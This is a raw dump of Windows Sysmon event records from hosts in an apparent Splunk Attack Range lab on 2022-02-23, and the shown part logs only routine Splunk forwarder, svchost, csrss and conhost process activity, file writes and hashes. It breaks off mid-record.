AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:45.883{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B48840F0314F2E9C6309F3431A7B1ADD,SHA256=4AB2A1A7BDCD2F9F45C53BC2247B4CF725B9DC1FB4FEC939E3ACBDE22E9B044F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298733Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:45.922{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7234BF10579245923A67565087F068,SHA256=CAE9E60DC75DF5BB5B7450209E8DD40842C59B9CE273BC8F6863902A0FF849BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:45.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC6FA7E8FA0340F934E802937723AB3D,SHA256=9BE9493666D806C90572C5C60B7B32968F8A83CF78037F1AF7CA97B9E3C967B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:45.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86DA539B53FA9FEA4D3A0AD5002F7FFB,SHA256=DAA10E88B3D7BD632B7B9F426B447D5BFEF96224345BA8357D3F8B1BFCF3AD45,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:45.040{4F8D34B0-1940-6216-4105-000000003902}3456300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298734Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:46.938{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3341B49CE39370FE4DDD500EC394E9E0,SHA256=DF7164786105087D3FC61E3FC88E2E01AB650419DE58835867AD90F572948496,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222585Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.838{4F8D34B0-1942-6216-4205-000000003902}36082268C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000222584Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:44.605{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51727-false10.0.1.12-8000- 23542300x8000000000000000222583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.713{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1942-6216-4205-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1942-6216-4205-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.634{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1942-6216-4205-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:46.635{4F8D34B0-1942-6216-4205-000000003902}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:23:47.954{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427F3A05AD0E211AFC6DB80DB9B6F2E3,SHA256=C03447059783843CD9E14957D6691575293D765559CB2AAFDE373586A676CB4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.663{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DC6FA7E8FA0340F934E802937723AB3D,SHA256=9BE9493666D806C90572C5C60B7B32968F8A83CF78037F1AF7CA97B9E3C967B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1943-6216-4305-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1943-6216-4305-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222594Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:23:47.211{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222593Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 